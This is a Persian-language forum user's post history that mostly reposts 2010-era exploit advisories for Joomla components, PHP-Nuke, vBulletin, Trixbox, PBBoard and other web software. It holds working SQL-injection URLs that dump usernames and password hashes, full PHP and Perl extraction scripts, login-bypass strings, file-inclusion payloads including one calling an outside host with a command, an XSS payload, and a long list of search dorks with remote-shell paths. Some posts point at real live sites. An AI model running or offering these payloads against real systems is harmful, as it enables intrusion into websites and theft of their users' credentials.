spyman

کاربران
  • تعداد ارسال ها

    260
  • تاریخ عضویت

  • آخرین بازدید

  • Days Won

    4

تمامی ارسال های spyman

  1. فکردم سایت که گزاشتی مال شماست lol
  2. Joomla com_products 'intCategoryId' Remote Sql Injection Vulnerability ============================================================================== Joomla com_about 'intCategoryId' Remote Sql Injection Vulnerability ///////// ============================================================================== *************************************************************************** Dork = inurl:com_products "intCategoryId" ########################################################################### ===[ Exploit ]=== => http://website/index.php?option=com_products&intCategoryId=-222 UnIon SelEct 1,2,group_concat(username,0x3a,password,0x3a,email),4,5,6,7,8+from+jos_users&op=category_details or => http://website/index.php?option=com_products&intCategoryId=-222 UnIon SelEct 1,2,group_concat(username,0x3a,password,0x3a,email),4,5,6,7,8+from+mos_users&op=category_details
  3. PhP-Nuke user.php SQL Injection view source print? ----------------------------Information------------------------------------------------ +Name : PhP-Nuke user.php SQL Injection +Autor : Easy Laster +Date : 04.03.2010 +Script : PhP-Nuke +Download : its a old version http://phpnuke.org/ +Price : 12,00$ +Language :PHP +Discovered by Easy Laster +Security Group 4004-Security-Project +Greetz to Team-Internet ,Underground Agents +And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok, Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge, N00bor,novaca!ne. --------------------------------------------------------------------------------------- ___ ___ ___ ___ _ _ _____ _ _ | | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_ |_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _| |_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_| |___| |___| ---------------------------------------------------------------------------------------- +Vulnerability : http://www.site.com/phpnuke/user.php?op=userinfo&uname= +Exploitable : http://www.site.com/phpnuke/user.php?op=userinfo&uname='+union+select +1,2,version(),4,5,6,7,8,9,10,11,12,13--+ ----------------------------------------------------------------------------------------- __________________
  4. vBulletin Version 3.8.4 File Include Vulnerability Security Reason Arrow Topic : vBulletin Version 3.8.4 File Include Vulnerability Arrow WLB : WLB-2010030006 (About) Arrow SecurityAlert : None Arrow Date : 2010-03-02 Arrow Credit : EjRaMHaCKeR Arrow Added by : EjRaMHaCKeR Arrow SecurityRisk : Low Security Risk Low (About) Arrow Remote : Yes Arrow Local : No Arrow Status : Bogus Arrow History : [2010-03-02] Started Arrow Affected software : vBulletin Version 3.8.4 Arrow Text : ======= ################################## # Script: vBulletin Version 3.8.4 File Include Vulnerability #Language: $php$ #Author : $EjRaM-HaCKeR$ #My home : [ www.sec-center.com ] #Greetz to : [Dr.eXe ,moroccoHaCkEr, All My Friends # $ EgyptHaCkeR ] # mail : m2z@9.cn $ tsv@hotmail.com ################################# ############# ===[ Exploits ]=== ########### # 1- http//www.site.com/[path]/vbseo_sitemap/vbseo_sitemap_functions.php?=[LFI] # 2- http//www.site.com/[path]/includes/functions.php?$classfile=[shell].txt? ######################## $EjRaM-HaCKeR$
  5. قوانین تایپیک رعایت کنین لطفا بین آموزش اسپم ندین
  6. Omnidocs SQL injection Vulnerability Security Reason Arrow Topic : Omnidocs SQL injection Vulnerability Arrow SecurityAlert : 7051 Arrow CVE : CVE-2010-0701 Arrow CWE : CWE-89 Arrow SecurityRisk : High Security Risk High (About) Arrow Remote Exploit : Yes Arrow Local Exploit : No Arrow Victim interaction required : No Arrow Exploit Available : Yes Arrow Credit : thebluegenius Arrow Published : 28.02.2010 Arrow Affected Software : newgensoft:omnidocs Arrow Advisory Content : -------------------------------------------------------------------- # Exploit Title: Omnidocs SQL injection Vulnerability # Date: 10 Feb 2010 # Author: thebluegenius # Software Link: http://www.newgensoft.com/omnidocs.asp # Version: All # Tested on: Apache-Coyote/1.1 | JBoss # CVE : NA --------------------------------------------------- "Omnidocs" SQL injection vulnerability. --------------------------------------------------- By :Thebluegenius. Email :rajsm@isac.org.in Blog :thebluegenius.com. --------------------------------------------------- Description: OmniDocs is an Enterprise Document Management (EDM) platform for creating, capturing, managing, delivering and archiving large volumes of documents and contents. Also integrates seamlessly with other enterprise applications. ------------------ Vulnerability ------------------ Affected URL: http://IPaddressOrDomain/omnidocs/ForceChangePassword.jsp Command: ' or 'a' = 'a' Confirmed SQL Injection error : ORA-00907: missing right parenthesis Command: or exists (select 1 from sys.dual) and ''x''=''x' Confirmed SQL Injection error : ORA-01756: quoted string not properly terminated ----------------------------------------------------- Greetz Fly Out to: 1] Amforked() : My good friend 2] Aodrulez : for inspiring me 3] www.OrchidSeven.com 4] www.isac.org.in این آخری . اکه مردی دیدم میزارم . تشکر کنین خیلی بهتر . اینجوری من میفهمم که کارم دارم درست انجام میدم منبع : ashiyane.org
  7. Trixbox 2.2.4 honecDirectory.php SQL Injection Security Reason Arrow Topic : Trixbox 2.2.4 honecDirectory.php SQL Injection Arrow SecurityAlert : 7053 Arrow CVE : CVE-2010-0702 Arrow CWE : CWE-89 Arrow SecurityRisk : High Security Risk High (About) Arrow Remote Exploit : Yes Arrow Local Exploit : No Arrow Victim interaction required : No Arrow Exploit Available : Yes Arrow Credit : NorSlacker Arrow Published : 28.02.2010 Arrow Affected Software : fonality:trixbox:2.2.4 Arrow Advisory Content : # Exploit Title: Trixbox PhonecDirectory.php SQL Injection # Date: 18.02.2010 # Author: NorSlacker # Software Link: http://trixbox.org/downloads # Version: 2.2.4 # Code : http://trixbox/cisco/services/PhoneDirectory.php?ID=1 [sql INJECTION] Example (Grab users / password hashes from sugarcrm) http://trixbox/cisco/services/PhoneDirectory.php?ID=1' UNION SELECT id,user_hash AS 'first_name',last_name,phone_home,user_name AS 'phone_work',user_hash AS 'phone_mobile',phone_other FROM users WHERE 1='1' GROUP BY 'id PhoneDirectory.php vulnerable code: # If the variable "ID" is passed in through the GET string, then display # extension, phone number and cell phone number for that record with the dial # key functionality if ($ID) { $PersonDirectoryListing = "<CiscoIPPhoneDirectory>\n"; $Query = "SELECT id, first_name, last_name, phone_home, phone_work, phone_mobile, phone_other "; $Query .= "FROM contacts WHERE id = '$ID "; $Query .= "ORDER BY last_name "; $SelectPersonInfo = mysql_query($Query,$ConnectionSuccess); ... } #norslacker [at] gmail [dot] com
  8. Joomla Component com_liveticker Blind SQL Injection Vulnerability LINK #!/usr/bin/php <?php ini_set("max_execution_time",0); print_r(' ##################################################################### [»] Joomla com_liveticker Remote Blind Injection Vulnerability ##################################################################### [»] Script: [Joomla] [»] Language: [ PHP ] [»] Founder: [ Snakespc Email:super_cristal@hotmail.com ] [»] Site: [ sec-war.com/cc>] [»] Greetz to:[ Spécial >>>>His0k4 >>>> Tous les hackers Algérie [»] Dork: [ inurl:index.php?option=com_liveticker "viewticker" ] ###################################################################### ###################################################################### # Joomla com_liveticker (tid) Blind SQL Injection Exploit # [x] Usage: Snakespc.php "http://url/index.php?option=com_liveticker&task=viewticker&tid=1" ###################################################################### '); if ($argc > 1) { $url = $argv[1]; $r = strlen(file_get_contents($url."+and+1=1--")); echo "\nExploiting:\n"; $w = strlen(file_get_contents($url."+and+1=0--")); $t = abs((100-($w/$r*100))); echo "Username: "; for ($i=1; $i <= 30; $i++) { $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--")); if (abs((100-($laenge/$r*100))) > $t-1) { $count = $i; $i = 30; } } for ($j = 1; $j < $count; $j++) { for ($i = 46; $i <= 122; $i=$i+2) { if ($i == 60) { $i = 98; } $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--")); if (abs((100-($laenge/$r*100))) > $t-1) { $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--")); if (abs((100-($laenge/$r*100))) > $t-1) { echo chr($i-1); } else { echo chr($i); } $i = 122; } } } echo "\nPassword: "; for ($j = 1; $j <= 49; $j++) { for ($i = 46; $i <= 102; $i=$i+2) { if ($i == 60) { $i = 98; } $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--")); if (abs((100-($laenge/$r*100))) > $t-1) { $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--")); if (abs((100-($laenge/$r*100))) > $t-1) { echo chr($i-1); } else { echo chr($i); } $i = 102; } } } } ?>
  9. Joomla Component com_yanc SQL Injection Vulnerability LINK ============================================================================== [»] Joomla com_yanc Remote Sql Injection Vulnerability ============================================================================== [»] Script: [Joomla] [»] Language: [ PHP ] [»] Founder: [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ] [»] Greetz to:[ His0k4, PrEdAtOr >>> All My Mamber >> sec-war.com/cc ] [»] Dork: [inurl:index.php?option=com_yanc "listid" ] ########################################################################### ===[ Exploit ]=== [»] http://server/index.php?option=com_yanc&Itemid=75&listid=-2+UNION SELECT concat(username,0x3a,password),2+from+jos_users-- [»]Author: Snakespc <- ###########################################################################
  10. Joomla Component com_perchagallery 1.4 SQL Injection Vulnerability Security Reason Arrow Topic : Joomla Component com_perchagallery 1.4 SQL Injection Vulnerability Arrow SecurityAlert : 7043 Arrow CVE : CVE-2010-0694 Arrow CWE : CWE-89 Arrow SecurityRisk : High Security Risk High (About) Arrow Remote Exploit : Yes Arrow Local Exploit : No Arrow Victim interaction required : No Arrow Exploit Available : No Arrow Credit : FL0RiX Arrow Published : 26.02.2010 Arrow Affected Software : percha:com_perchagallery:1.4 and previous versions Arrow Advisory Content : # Joomla Component com_perchagallery SQL Injection Vulnerability # Author :FL0RiX # # Name : com_perchagallery # # Bug Type : SQL Injection # # Infection : Admin login bilgileri alinabilir. # # Demo Vuln : # # http://www.community.phoenixmbs.com/index.php?option=com_perchagallery&view =editunidad&id=[EXPLOIT] # #EXPLOIT : null/**/union/**/select/**/1,concat(username,0x3a,password)fl0rix,3,4,5,6/* */from/**/jos_users-- ########################################################################
  11. WSC CMS (Bypass) SQL Injection Vulnerability Security Reason Arrow Topic : WSC CMS (Bypass) SQL Injection Vulnerability Arrow SecurityAlert : 7045 Arrow CVE : CVE-2010-0698 Arrow CWE : CWE-89 Arrow SecurityRisk : High Security Risk High (About) Arrow Remote Exploit : Yes Arrow Local Exploit : No Arrow Victim interaction required : No Arrow Exploit Available : Yes Arrow Credit : Phenom Arrow Published : 26.02.2010 Arrow Affected Software : dynamicsoft:wsc_cms:2.2 Arrow Advisory Content : # Exploit Title: WSC CMS (Bypass) SQL Injection Vulnerability # Date: 2010-02-19 # Author: Phenom # Software Link: # Version: # Tested on: windows xp sp3 # CVE : # Code : ------------------------------------------------------ ------------------------------------------------------ _____ _ | __ | | | |__) | |__ ___ _ __ ___ _ __ ___ | ___/| '_ \ / _ \ '_ / _/| '_ ` _ \ | | | | | | __/ | | | (_) | | | | | | |_| |_| |_|\___|_| |_|\/__/|_| |_| |_| ------------------------------------------------------ ------------------------------------------------------ ############### WSC CMS (Bypass) SQL Injection Vulnerability ################################### # # Author : Phenom # # mail : sys.phenom.sys[at]gmail[dot]com # # Dork : Realizzato con WSC CMS by Dynamicsoft # ####### Exploit ############################################################# # # 1- http://server/public/backoffice # # 2- login with "admin" as user name and 'or as password # #############################################################
  12. Joomla Component com_hdflvplayer SQL injection exploit #!/usr/bin/perl -w ############################################################################################### # # [~] Joomla Component com_hdflvplayer SQL injection exploit - (id) # [~] Author : kaMtiEz (kamzcrew@yahoo.com) # [~] Homepage : http://www.indonesiancoder.com # [~] Date : 15 February, 2010 # ############################################################################################### # # [ Software Information ] # # [+] Vendor : http://www.hdflvplayer.net/ # [+] Price : $ 99.00 # [+] Vulnerability : SQL injection # [+] Dork : inurl:"CIHUY" # [+] Type : commercial # ############################################################################################### # # USAGE : perl kaMz.pl # ############################################################################################### print "\t\t[!]=========================================================[!]\n\n"; print "\t\t [~] INDONESIANCODER TEAM [~] \n\n"; print "\t\t[!]=========================================================[!]\n\n"; print "\t\t [!]Joomla component com_hdflvplayer SQL injection exploit[!] \n\n"; print "\t\t [~] by kaMtiEz [~] \n\n"; print "\t\t[!]=========================================================[!]\n\n"; use LWP::UserAgent; print "\nsite/path[!]http://www.indonesiancoder.com/kaMz/[!]:"; chomp(my $IBL13Z=<STDIN>); $kaMtiEz="concat(username,0x3a,password)"; $tukulesto="jos_users"; $pathloader="com_hdflvplayer"; $r3m1ck = LWP::UserAgent->new() or die "Could not initialize browser\n"; $r3m1ck->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $arianom = $IBL13Z . "/index.php?option=".$pathloader."&id=1+AND+1=2+UNION+SELECT+".$kaMtiEz.",1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+".$t ukulesto."--"; $gonzhack = $r3m1ck->request(HTTP::Request->new(GET=>$arianom)); $contrex = $gonzhack->content; if ($contrex =~/([0-9a-fA-F]{32})/){ print "\n[+] CIHUY Admin Password Nya GAN [+]: $1\n\n"; } else{print "\n[+] Exploit GAGAL GAN ![+]\n"; }
  13. PBBoard 2.0.5 add administrator and shell upload vulnerabilities Security Reason Topic : PBBoard 2.0.5 add administrator and shell upload vulnerabilities WLB : WLB-2010020135 (About) SecurityAlert : None Date : 2010-02-26 Credit : indoushka SecurityRisk : High (About) Remote : Yes Local : No Status : Bug History : [2010-02-26] Started Affected software : PBBoard 2.0.5 Text : =========================================================================== ============= | # Title : PBBoard Version 2.0.5 Mullti Vulnerability | # Author : indoushka | # email : indoushka@hotmail.com | # Home : www.iq-ty.com | # Web Site : http://www.pbboard.com/PBBoard_v2.0.5.zip | # Dork : Powered by PBBoard© 2009 Version 2.0.5 | # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) | # Bug : Mullti ====================== Exploit By indoushka ================================= # Exploit : 1- Add Admin: http://127.0.0.1/upload/setup/install/?step=4 2- upload Vulnerability: Fter register go to http://127.0.0.1/upload/index.php?page=usercp&control=1&avatar=1&am p;main=1 After Upload go to 2 find http://127.0.0.1/Upload/download/avatar/(Ev!l name.php) Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * Xproratix ========================================== Greetz : Exploit-db Team : (loneferret+Exploits+dookie2000ca) all my friend : His0k4 * Hussin-X * Rafik (Tinjah.com) * Yashar (sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc) www.owned-m.com * Stake (v4-team.com) * www.securitywall.org * r1z (www.sec-r1z.com) www.securityreason.com * www.packetstormsecurity.org * www.m-y.cc * Cyb3r IntRue (avengers team) www.hacker.ps * no-exploit.com * www.bawassil.com * www.xp10.me * www.mormoroth.net www.alkrsan.net * www.kadmiwe.net * www.arhack.net --------------------------------------------------------------------------- -----------------------------------
  14. Joomla 1.5.15 Persistant XSS in 'Author Alias Security Reason Topic : Joomla 1.5.15 Persistant XSS in 'Author Alias' WLB : WLB-2010020137 (About) SecurityAlert : None Date : 2010-02-26 Credit : coffey Added by : SecurityReason SecurityRisk : Low (About) Remote : Yes Local : No Status : Bug History : [2010-02-26] Started Affected software : Joomla 1.5.15 Text : date -------------[ 24.02.2010 prog -------------[ Joomla 1.5.15 vuln -------------[ Persistant XSS in 'Author Alias' source -------------[ www.joomla.org by -------------[ coffey poc Persistant XSS in 'Author Alias' when adding new Article (logged only). /administrator/index.php?option=com_content&sectionid=0&task=edit&a mp;cid[]=46 $details_created_by_alias="><script>alert(1)</script>
  15. WebAdministrator Lite CMS SQL Injection Vulnerability LINK ============ { Ariko-Security - Advisory #5/2/2010 } ============= SQL injection vulnerability in WebAdministrator Lite CMS Vendor's Description of Software: # http://jskinternet.pl/portal/jsk/3/Oferta.html Dork: # webadministrator lite Application Info: # Name: WebAdministrator Lite CMS # Versions: LITE Vulnerability Info: # Type: SQL injection Vulnerability # Risk: medium Fix: # N/A Time Table: # 25/02/2010 - Vendor notified. # 25/02/2010 - Vendor response "we will not release FIX for LITE, soon new version".... Input passed via the "s" parameter to download.php is not properly sanitised before being used in a SQL query. Solution: # Input validation of "s" parameter should be corrected. Vulnerability: # http://[site]/download.php?s=[sqli]&id=2324 Credit: # Discoverd By: MG # Website: http://Ariko-security.com # Contacts: support[-at-]ariko-security.com Ariko-Security Maciej Gojny vuln@ariko-security.com tel.: +48512946012 (Mo-Fr 10.00-20.00 CET)
  16. اینم هست یه سری بدون نمونه
  17. Title: phpBazar <= 2.1.0 Multiple vulnerabilites URL: http://www.smartisoft.com/ Dork: inurl:classified.php phpbazar Exploits: -remote file inclusion: /classified_right.php?language_dir=http://yourhost/cmd.gif?cmd=ls -access to admin login and password: /admin/admin.php?action=edit_member&value=1 link یه نمونه http://www.eaa-mauritius.com/phpBaza...member&value=1 در ضمن می تونید دورک های تو سایتهای دیگر هم استفاده کنید.
  18. Joomla com_joomlaconnect_be Remote Blind Injection Vulnerability Link view source print? #!/usr/bin/php <?php ini_set("max_execution_time",0); print_r(' ########################################################################### [»] Joomla com_joomlaconnect_be Remote Blind Injection Vulnerability ########################################################################### [»] Script: [Joomla] [»] Language: [ PHP ] [»] Founder: [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ] [»] Greetz to:[ Spécial >>>>His0k4 >>>> Tous les hackers Algérie [»] Dork: inurl:index.php?option=com_joomlaconnect_be ########################################################################### ########################################################################### # # Joomla com_joomlaconnect_be (id) Blind SQL Injection Exploit # [x] Usage: joomla.php "http://url/index.php?option=com_joomlaconnect_be&Itemid=53&task=showBizPage&id=3 # # ########################################################################### '); if ($argc > 1) { $url = $argv[1]; $r = strlen(file_get_contents($url."+and+1=1--")); echo "\nExploiting:\n"; $w = strlen(file_get_contents($url."+and+1=0--")); $t = abs((100-($w/$r*100))); echo "Username: "; for ($i=1; $i <= 30; $i++) { $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--")); if (abs((100-($laenge/$r*100))) > $t-1) { $count = $i; $i = 30; } } for ($j = 1; $j < $count; $j++) { for ($i = 46; $i <= 122; $i=$i+2) { if ($i == 60) { $i = 98; } $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--")); if (abs((100-($laenge/$r*100))) > $t-1) { $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--")); if (abs((100-($laenge/$r*100))) > $t-1) { echo chr($i-1); } else { echo chr($i); } $i = 122; } } } echo "\nPassword: "; for ($j = 1; $j <= 49; $j++) { for ($i = 46; $i <= 102; $i=$i+2) { if ($i == 60) { $i = 98; } $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--")); if (abs((100-($laenge/$r*100))) > $t-1) { $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--")); if (abs((100-($laenge/$r*100))) > $t-1) { echo chr($i-1); } else { echo chr($i); } $i = 102; } } } } ?>
  19. . Article Friendly <= SQL Injection Vulnerability Security Reason Link Arrow Topic : Article Friendly <= SQL Injection Vulnerability Arrow WLB : WLB-2010020122 (About) Arrow SecurityAlert : None Arrow Date : 2010-02-23 Arrow Credit : SkuLL-HacKeR Arrow Added by : SecurityReason Arrow SecurityRisk : Medium Security Risk Medium (About) Arrow Remote : Yes Arrow Local : No Arrow Status : Bug Arrow History : [2010-02-23] Started Arrow Affected software : Article Friendly Arrow Text : ========= [!] Article Friendly <= SQL Injection Vulnerability ========== # Author : SkuLL-HacKeR # Site p4ge : http://www.articlefriendly.com/ # # GreetZ : AmiZya - Stack - djekmani4ever # Dork : Powered by Article DashBoard # # Sh0w CreW : Jiko HxH - THE SAD HACKER # My Home: www.no-exploit.com & # wWw.Owned-m.CoM # T3st3d on: MacBook & Windows XP SP3 ############## ===[ #-/Expl0it Code\-# : ]=== # SQL Injection Vulnerability : #-/ Link Admin: www.Target.com/[scriptarticleLoser]/admin/ #-/ 0r : www.Target.com[script-article-Loser]/admin/index.php?filename=adminlogin #-/Username : admin' or 'a'='a #-/Password : adminKas0l ############## http://www.familyfriendsphotos.com/admin/index.php?filename=adminlogin
  20. 4 Amelia CMS remote SQL injection Security Reason LINK Arrow Topic : Amelia CMS remote SQL injection Arrow WLB : WLB-2010020113 (About) Arrow SecurityAlert : None Arrow Date : 2010-02-23 Arrow Credit : Ariko-Security Arrow SecurityRisk : Medium Security Risk Medium (About) Arrow Remote : Yes Arrow Local : No Arrow Status : Bug Arrow History : [2010-02-23] Started Arrow Affected software : Amelia CMS Arrow Text : # Title: [sql injection vulnerability in Amelia CMS] # Date: [10.02.2010] # Author: [Ariko-Security] # Software Link: [http://www.ameliadesign.eu/] # Version: [ALL] # Tested on: [freebsd / ubuntu] ============ { Ariko-Security - Advisory #3/2/2010 } ============= SQL injection vulnerability in Amelia CMS Vendors Description of Software: # http://www.ameliadesign.eu/index.php?page=1322&lang=eng&cnt=service s Dork: # N/A Application Info: # Name: Amelia CMS # Versions: ALL Vulnerability Info: # Type: SQL injection Vulnerability # Risk: High Fix: # N/A Time Table # 10/02/2009 - Vendor notified. Input passed via the "page" parameter to index.php is not properly sanitised before being used in a SQL query and it is possible to get sensitive information using for example Time-Base Blind SQL Injection attacks. Solution: # Input validation of "page" parameter should be corrected. Vulnerability: # http://www.[site]/index.php?page=1322[sqli]&lang=eng&cnt=services Credit: # Discoverd By: MG # Website: http://Ariko-security.com Advisory: #http://www.ariko-security.com/feb2010/ad453.html # Contacts: support[-at-]ariko-security.com
  21. اینم سومی Core Joomla Community Polls Component 'controller' Parameter Local File Include Vulnerability Security Focus LINK Bugtraq ID: 38330 Class: Input Validation Error CVE: Remote: Yes Local: No Published: Feb 19 2010 12:00AM Updated: Feb 22 2010 04:02PM Credit: kaMtiEz Vulnerable: Core Joomla Community Polls 1.5.2 Not Vulnerable: Core Joomla Community Polls 1.5.3 Attackers can exploit this issue via a browser. The following example URI is available: http://www.example.com/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00
  22. اینم دومی Security Reason LINK Topic : The Joomla ACStartSeite component SQL injection vulnerability Arrow WLB : WLB-2010020103 (About) Arrow SecurityAlert : None Arrow Date : 2010-02-19 Arrow Credit : AtT4CKxT3rR0r1ST Arrow SecurityRisk : Medium Security Risk Medium (About) Arrow Remote : Yes Arrow Local : No Arrow Status : Bug Arrow History : [2010-02-19] Started Arrow Affected software : The Joomla ACStartSeite component Arrow Text : Joomla Component com_acstartseite Sql Injection Vulnerability ============================================================== ####### .:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn] .:. Home : www.sec-attack.com/vb [sec Attack Team] .:. Bug Type : Sql Injection[Mysql] .:. Dork : inurl:"com_acstartseite" ####### ===[ Exploit ]=== www.site.com/index.php?option=com_acstartseite&Itemid=null[sql]&lan g=de www.site.com/index.php?option=com_acstartseite&Itemid=null+and+1=2+unio n+select+1,2,concat(username,0x20,password),4,5,6,7,8,9,10,11,12,13,14,15,1 6,17+from+mos_users&lang=de #######
  23. اینم سری اول inurl:"com_admin" administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=shell inurl:index.php?option=com_simpleboard /components/com_simpleboard/file_upload.php?sbp=shell inurl:"com_hashcash" /components/com_hashcash/server.php?mosConfig_absolute_path=shell inurl:"com_htmlarea3_xtd-c" /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=shell inurl:"com_sitemap" /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=shell inurl:"com_performs" components/com_performs/performs.php?mosConfig_absolute_path=shell inurl:"com_forum" /components/com_forum/download.php?phpbb_root_path= inurl:"com_pccookbook" components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=shell inurl:index.php?option=com_extcalendar /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=shell inurl:"minibb" components/minibb/index.php?absolute_path=shell inurl:"com_smf" /components/com_smf/smf.php?mosConfig_absolute_path= /modules/mod_calendar.php?absolute_path=shell inurl:"com_pollxt" /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=shell inurl:"com_loudmounth" /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=shell inurl:"com_videodb" /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=shel l inurl:index.php?option=com_pcchess /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=shell inurl:"com_multibanners" /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=sh ell inurl:"com_a6mambohelpdesk" /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=shel l inurl:"com_colophon" /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=shell inurl:"com_mgm" administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=shell inurl:"com_mambatstaff" /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=shell inurl:"com_securityimages" /components/com_securityimages/configinsert.php?mosConfig_absolute_path=shell /components/com_securityimages/lang.php?mosConfig_absolute_path=shell inurl:"com_artlinks" /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=shell inurl:"com_galleria" /components/com_galleria/galleria.html.php?mosConfig_absolute_path=shell inurl:"com_akocomment" /akocomments.php?mosConfig_absolute_path=shell inurl:"com_cropimage" administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=shell inurl:"com_kochsuite" /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=shell inurl:"com_comprofiler" administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=shell inurl:"com_zoom" /components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=shell /components/com_zoom/includes/database.php?mosConfig_absolute_path=shell inurl:"com_serverstat" /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=she ll inurl:"com_fm" components/com_fm/fm.install.php?lm_absolute_path=shell inurl:com_mambelfish administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=shell inurl:com_lmo components/com_lmo/lmo.php?mosConfig_absolute_path=shell inurl:com_linkdirectory administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_ path=shell inurl:com_mtree components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_pat h=shell inurl:com_jim administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=shell inurl:com_webring administrator/components/com_webring/admin.webring.docs.php?component_dir=shell inurl:com_remository administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:com_babackup administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=shell inurl:com_lurm_constructor administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=shell inurl:com_mambowiki components/com_mambowiki/ MamboLogin.php?IP=shell inurl:com_a6mambocredits administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=shell inurl:com_phpshop administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=s hell inurl:com_cpg components/com_cpg/cpg.php?mosConfig_absolute_path=shell inurl:com_moodle components/com_moodle/moodle.php?mosConfig_absolute_path=shell inurl:com_extended_registration components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath=shell inurl:com_mospray components/com_mospray/scripts/admin.php?basedir=shell inurl:com_bayesiannaivefilter /administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=shell inurl:com_uhp /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=shell inurl:com_peoplebook /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=shell inurl:com_mmp /administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=shell inurl:com_reporter /components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=shell inurl:com_madeira /components/com_madeira/img.php?url=shell inurl:com_jd-wiki /components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=shell inurl:com_bsq_sitestats /components/com_bsq_sitestats/external/rssfeed.php?baseDir=shell /com_bsq_sitestats/external/rssfeed.php?baseDir=she
  24. سلام این برای کسای که از 17 به 25 آپ میکن گفتم دیدم این اینجا باشه خوبه یه سری باگ تو سابت گزاشتم و دارم راههای نفوزشو هم دارم درست میکنم اگه راهی باشه میزارم و راهنمای میکنم . من کارم هک باگ گیری باشما
  25. این ایرور میده کل ایرور اینه